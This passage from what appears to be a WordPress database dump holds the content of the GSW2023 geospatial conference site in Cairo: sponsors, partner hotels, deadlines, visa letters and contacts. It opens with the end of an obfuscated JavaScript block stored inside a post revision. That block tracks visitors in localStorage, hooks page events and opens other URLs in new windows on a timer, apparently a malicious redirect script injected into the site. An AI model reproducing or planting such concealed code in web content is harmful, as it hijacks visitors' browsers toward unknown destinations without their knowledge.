_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:46:49','2023-06-21 23:46:49','',3066,'https://gsw2023.com/?p=4734',0,'revision','',0),
(4736,1,'2023-06-21 23:49:44','2023-06-21 23:49:44','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687389797868{margin-top: 10px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 